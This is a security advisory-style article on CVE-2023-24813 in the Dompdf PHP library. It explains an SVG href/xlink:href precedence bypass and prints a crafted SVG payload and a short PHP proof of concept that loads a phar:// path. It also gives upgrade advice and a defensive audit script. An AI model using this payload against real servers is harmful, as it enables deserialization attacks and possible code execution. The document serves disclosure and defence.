Summary:
Dompdf is a popular open source library for converting HTML to PDF using PHP. In February 2023, security researchers discovered a critical vulnerability (CVE-2023-24813) in how Dompdf handles SVG image tags. This flaw allows attackers to call arbitrary URLs via specially crafted SVGs — and in some cases, can result in file deletion, information leakage, or even remote code execution (RCE) on vulnerable servers. This article provides a clear explanation, an example exploit, and actionable advice.
Understanding the Vulnerability
What’s affected?
Running Dompdf on PHP versions before 8.0.0 is especially dangerous, as the issue can then be escalated into an unserialize exploit.
Root cause:
The bug arises due to inconsistent handling of SVG <image> tag attributes between Dompdf and its dependency, php-svg-lib. Here’s how it works:
- When you use an SVG like <image xlink:href="..." href="...">, *Dompdf* prioritizes xlink:href and tries to sanitize it.
- Meanwhile, php-svg-lib (which later processes the SVG) trusts the href attribute if both are present, and prefers it if xlink:href is empty.
- As a result, it’s possible to sneak past Dompdf’s checks by putting an empty (or benign) xlink:href="" in the tag but a malicious URL in href.
This allows arbitrary (even dangerous) protocols or URLs to be referenced and fetched — defeating built-in protections.
The following SVG snippet illustrates the bypass trick:
<svg width="100" height="100"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="" href="phar:///tmp/payload.phar" height="100" width="100"/>
</svg>
- Dompdf sees xlink:href as empty and thinks there’s no danger.
- php-svg-lib then falls back to href and will try to load phar:///tmp/payload.phar.
If the targeted PHP version is below 8.0.0 (where certain deserialization behaviors are more risky), this can lead to an arbitrary unserialize vulnerability, meaning attacker-controlled object data can be injected, leading to file deletion and potential code execution.
Proof-of-Concept Exploit
Here’s a simple PHP code snippet to demonstrate how the exploit works in an environment running an unpatched Dompdf version:
<?php
require 'vendor/autoload.php';
use Dompdf\Dompdf;
// SVG carrying the bypass shape: an empty xlink:href next to a malicious href
$svg = <<<SVG
<svg width="100" height="100"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="" href="phar:///tmp/exploit.phar" height="100" width="100"/>
</svg>
SVG;
// This would normally be user-controlled input
$html = '<html><body>' . $svg . '</body></html>';
$dompdf = new Dompdf();
$dompdf->loadHtml($html);
$dompdf->render(); // Rendering triggers the image load (and the exploit) via php-svg-lib
If you are running PHP below 8.0.0, and /tmp/exploit.phar is an attacker-controlled payload, this leads to unserialization of attacker-supplied data and, in certain setups, to remote code execution (RCE).
There are NO safe configuration workarounds. Only applying the patch or upgrading can close this hole.
- Reported: Early 2023
- Patched in: Commit 95009ea98
- Released in: Dompdf 2.0.3
Recommendations
If you use Dompdf:
- Upgrade to Dompdf 2.0.3 or later, the release that contains the patch.
- If using PHP below 8.0.0, strongly consider upgrading to PHP 8.x as well.
- There are no reliable workarounds. Filtering input for <image href=""> is tricky and not future-proof.
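The following PHP script is an added example, not part of the original article and not code from Dompdf or php-svg-lib. It models the two attribute-precedence rules described in the root-cause section as two small resolver functions, then audits an SVG document and reports every <image> element where the URL one rule would check differs from the URL the other would load, or where the loaded URL uses a scheme outside an allowlist. The resolver functions are a simplified model of the behaviour the article describes, and the allowlist and the sample SVG are constructed for the example; it only needs PHP's bundled DOM extension.

```php
<?php
// Added example (not Dompdf/php-svg-lib code): audit SVG input for <image>
// elements whose href and xlink:href would be resolved differently by the two
// precedence rules the article describes, and for non-allowlisted URL schemes.
declare(strict_types=1);

const XLINK_NS = 'http://www.w3.org/1999/xlink';
// Constructed allowlist for this example; adjust to what your templates need.
const ALLOWED_SCHEMES = ['http', 'https', 'data'];

// Value of xlink:href, or null when the attribute is absent.
function xlinkHrefOf(DOMElement $img): ?string
{
    if ($img->hasAttributeNS(XLINK_NS, 'href')) {
        return $img->getAttributeNS(XLINK_NS, 'href');
    }
    // Tolerate documents that use the xlink: prefix without declaring it.
    if ($img->hasAttribute('xlink:href')) {
        return $img->getAttribute('xlink:href');
    }
    return null;
}

// Value of the plain href attribute, or null when absent.
function hrefOf(DOMElement $img): ?string
{
    return $img->hasAttribute('href') ? $img->getAttribute('href') : null;
}

// Simplified model of the rule the article attributes to Dompdf:
// xlink:href is the value that gets checked whenever it is present, even if empty.
function resolveLikeDompdf(DOMElement $img): string
{
    return xlinkHrefOf($img) ?? hrefOf($img) ?? '';
}

// Simplified model of the rule the article attributes to php-svg-lib:
// href is the value that gets loaded whenever it is present, else xlink:href.
function resolveLikeSvgLib(DOMElement $img): string
{
    return hrefOf($img) ?? xlinkHrefOf($img) ?? '';
}

// URL scheme in lower case, or 'relative' when the reference has none.
function schemeOf(string $url): string
{
    return preg_match('/^([a-z][a-z0-9+.\-]*):/i', trim($url), $m)
        ? strtolower($m[1])
        : 'relative';
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditSvg(string $svg): array
{
    $findings = [];
    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $ok = $doc->loadXML($svg, LIBXML_NONET); // never fetch anything while parsing
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        return [['image' => null, 'issue' => 'unparseable SVG']];
    }
    $xpath = new DOMXPath($doc);
    // local-name() matches <image> whether or not the SVG namespace is declared.
    foreach ($xpath->query('//*[local-name()="image"]') as $i => $img) {
        $checked = resolveLikeDompdf($img);
        $loaded  = resolveLikeSvgLib($img);
        if ($checked !== $loaded) {
            $findings[] = ['image' => $i, 'issue' => 'attribute mismatch',
                           'checked' => $checked, 'loaded' => $loaded];
        }
        $scheme = schemeOf($loaded);
        // Relative references resolve against the document base and are left alone here.
        if ($scheme !== 'relative' && !in_array($scheme, ALLOWED_SCHEMES, true)) {
            $findings[] = ['image' => $i, 'issue' => "disallowed scheme '$scheme'",
                           'url' => $loaded];
        }
    }
    return $findings;
}

// Constructed sample: the bypass shape from the article plus a benign image.
$sample = <<<'SVG'
<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="" href="phar:///tmp/payload.phar" height="100" width="100"/>
  <image xlink:href="https://example.com/logo.png" height="100" width="100"/>
</svg>
SVG;

foreach (auditSvg($sample) as $finding) {
    echo json_encode($finding), PHP_EOL;
}
```

For the sample, the first image is reported twice (the Dompdf-style rule checks an empty string while the php-svg-lib-style rule would load the phar:// URL, and phar is not an allowlisted scheme); the second image produces no finding. The check is useful for logging and for rejecting obviously inconsistent documents at the edge, but it reasons about attribute shapes rather than about what the libraries actually do with the URL, so, as the recommendations say, it complements the upgrade to Dompdf 2.0.3 and does not replace it.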
References
- Original Advisory on GitHub
- Dompdf Patch Commit
- CVE-2023-24813 at NVD
- OWASP SSRF Explanation
- php-svg-lib
Closing Thoughts
This issue demonstrates how subtle differences between similar libraries (in this case, Dompdf and php-svg-lib's SVG attribute parsing) can introduce high-impact security bugs — even in mature projects. With increasing use of complex HTML-to-PDF generation and third-party templates, always keep your dependencies up to date and watch for code paths (like image tags) that bridge from user input to system calls.
If you run Dompdf in production, patch now and review your audit and update policies regularly!
Stay secure!
If this information saved you headaches, please share it with your developer or security teams.
Timeline
Published on: 02/07/2023 19:15:00 UTC
Last modified on: 02/16/2023 14:53:00 UTC